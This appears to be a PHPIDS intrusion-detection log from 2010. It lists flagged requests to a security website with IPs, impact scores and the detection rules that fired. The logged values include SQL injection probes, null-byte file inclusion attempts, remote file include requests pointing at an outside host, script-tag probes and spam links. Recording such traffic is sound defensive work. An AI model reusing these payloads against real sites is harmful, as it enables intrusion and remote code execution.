Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:43
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123029
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:42
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123030
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:42
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123027
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:39
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123028
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:39
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123025
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:38
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123026
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278
IP:110.230.228.252
Impact:46
Created:2010-04-30 01:33:38
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123023
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'`([{^~
Page:/i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E
IP:110.230.228.252
Impact:24
Created:2010-04-30 01:33:35
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:123024
Name:GET.page
Value:security/?page=security/hackingillustrated'`([{^~
Page:/i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E
IP:110.230.228.252
Impact:24
Created:2010-04-30 01:33:35
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:123021
Name:REQUEST.codeme
Value:Good Job, <a href= http://buynowpaylaternocreditche.imagekind.com/#1 >buy now pay later no credit check free</a> [url=http://buynowpaylaternocreditche.imagekind.com/#1]buy now pay later no credit check free[/url], schel,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 00:50:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123022
Name:POST.codeme
Value:Good Job, <a href= http://buynowpaylaternocreditche.imagekind.com/#1 >buy now pay later no credit check free</a> [url=http://buynowpaylaternocreditche.imagekind.com/#1]buy now pay later no credit check free[/url], schel,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 00:50:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123019
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=23874815&CFTOKEN#=999fe3beaf1ebaa2-24C21F7D-070C-8490-6E00EB4435F95464#lastvisit={ts '2010-04-22 18:33:30'}#timecreated={ts '2010-04-22 18:33:30'}#hitcount=2#cftoken=999fe3beaf1ebaa2-24C21F7D-070C-8490-6E00EB4435F95464#cfid=23874815#
Page:/
IP:69.175.7.130
Impact:64
Created:2010-04-30 00:36:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:123020
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=23874815&CFTOKEN#=999fe3beaf1ebaa2-24C21F7D-070C-8490-6E00EB4435F95464#lastvisit={ts '2010-04-22 18:33:30'}#timecreated={ts '2010-04-22 18:33:30'}#hitcount=2#cftoken=999fe3beaf1ebaa2-24C21F7D-070C-8490-6E00EB4435F95464#cfid=23874815#
Page:/
IP:69.175.7.130
Impact:64
Created:2010-04-30 00:36:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:123017
Name:REQUEST.page
Value:--'security'/h
Page:/i.php?page=--%27security%27/h
IP:67.195.111.36
Impact:6
Created:2010-04-30 00:23:48
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123018
Name:GET.page
Value:--'security'/h
Page:/i.php?page=--%27security%27/h
IP:67.195.111.36
Impact:6
Created:2010-04-30 00:23:48
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123015
Name:REQUEST.codeme
Value:Only, <a href= http://virtualdatinggame.imagekind.com/#1 >virtual dating game free</a> [url=http://virtualdatinggame.imagekind.com/#1]virtual dating game free[/url], %))),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-30 00:00:43
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:123016
Name:POST.codeme
Value:Only, <a href= http://virtualdatinggame.imagekind.com/#1 >virtual dating game free</a> [url=http://virtualdatinggame.imagekind.com/#1]virtual dating game free[/url], %))),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-30 00:00:43
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:123013
Name:REQUEST.page
Value:<script>security/barcode-asciiscript
Page:/i.php?page=%3Cscript%3Esecurity/barcode-asciiscript
IP:67.195.111.36
Impact:16
Created:2010-04-29 20:08:38
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38

ID:123014
Name:GET.page
Value:<script>security/barcode-asciiscript
Page:/i.php?page=%3Cscript%3Esecurity/barcode-asciiscript
IP:67.195.111.36
Impact:16
Created:2010-04-29 20:08:38
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38

ID:123011
Name:REQUEST.page
Value:videos/keyllama-<acronym title=
Page:/i.php?page=videos/keyllama-%3Cacronym%20title=
IP:67.195.111.36
Impact:8
Created:2010-04-29 19:36:35
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:123012
Name:GET.page
Value:videos/keyllama-<acronym title=
Page:/i.php?page=videos/keyllama-%3Cacronym%20title=
IP:67.195.111.36
Impact:8
Created:2010-04-29 19:36:35
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:123009
Name:REQUEST.codeme
Value:I like it so much, <a href= http://hallmarkcards.imagekind.com/#1 >hallmark cards</a> [url=http://hallmarkcards.imagekind.com/#1]hallmark cards[/url], 8-)),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-29 17:45:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123010
Name:POST.codeme
Value:I like it so much, <a href= http://hallmarkcards.imagekind.com/#1 >hallmark cards</a> [url=http://hallmarkcards.imagekind.com/#1]hallmark cards[/url], 8-)),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-29 17:45:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123007
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 17:08:24
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123008
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 17:08:24
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123005
Name:REQUEST.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 17:08:19
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123006
Name:GET.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 17:08:19
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123003
Name:REQUEST.codeme
Value:Perfect work, <a href= http://bearinbeercooler.imagekind.com/ >bear in beer cooler</a>, [url= http://bearinbeercooler.imagekind.com/ ]bear in beer cooler[/url], ivwx,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-29 16:56:02
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123004
Name:POST.codeme
Value:Perfect work, <a href= http://bearinbeercooler.imagekind.com/ >bear in beer cooler</a>, [url= http://bearinbeercooler.imagekind.com/ ]bear in beer cooler[/url], ivwx,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-29 16:56:02
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123001
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 16:49:18
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123002
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 16:49:18
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122999
Name:REQUEST.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 16:49:17
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123000
Name:GET.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 16:49:17
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122997
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 16:46:19
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122998
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 16:46:19
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122995
Name:REQUEST.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 16:46:15
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122996
Name:GET.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:173.61.105.153
Impact:10
Created:2010-04-29 16:46:15
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122993
Name:REQUEST.codeme
Value:Excellent site. It was pleasant to me., <a href= http://vodkalimesugarice.imagekind.com/#1 >vodka lime sugar ice price</a> [url=http://vodkalimesugarice.imagekind.com/#1]vodka lime sugar ice price[/url], %-),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-29 16:06:47
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:122994
Name:POST.codeme
Value:Excellent site. It was pleasant to me., <a href= http://vodkalimesugarice.imagekind.com/#1 >vodka lime sugar ice price</a> [url=http://vodkalimesugarice.imagekind.com/#1]vodka lime sugar ice price[/url], %-),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-29 16:06:47
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:122991
Name:REQUEST.codeme
Value:So where it to find, <a href= http://shoecarnival.imagekind.com/ >shoe carnival online</a>, [url= http://shoecarnival.imagekind.com/ ]shoe carnival online[/url], ycq,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-29 15:17:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122992
Name:POST.codeme
Value:So where it to find, <a href= http://shoecarnival.imagekind.com/ >shoe carnival online</a>, [url= http://shoecarnival.imagekind.com/ ]shoe carnival online[/url], ycq,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-29 15:17:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122990
Name:GET.page
Value:doomsday/nuclear-war-survival"%20rel="nofollow">
Page:/i.php?page=doomsday/nuclear-war-survival%22%2520rel=%22nofollow%22%3e
IP:67.195.111.36
Impact:42
Created:2010-04-29 14:54:17
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122989
Name:REQUEST.page
Value:doomsday/nuclear-war-survival"%20rel="nofollow">
Page:/i.php?page=doomsday/nuclear-war-survival%22%2520rel=%22nofollow%22%3e
IP:67.195.111.36
Impact:42
Created:2010-04-29 14:54:16
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122985
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:44:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122986
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:44:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122987
Name:REQUEST.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:44:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122988
Name:GET.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:44:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122981
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:44:06
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122982
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:44:06
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122983
Name:REQUEST.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:44:06
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122984
Name:GET.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:44:06
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122977
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:43:49
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122978
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:43:49
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122979
Name:REQUEST.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:43:49
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122980
Name:GET.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:43:49
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122973
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:43:47
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122974
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:43:47
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122975
Name:REQUEST.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:43:47
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122976
Name:GET.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:43:47
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
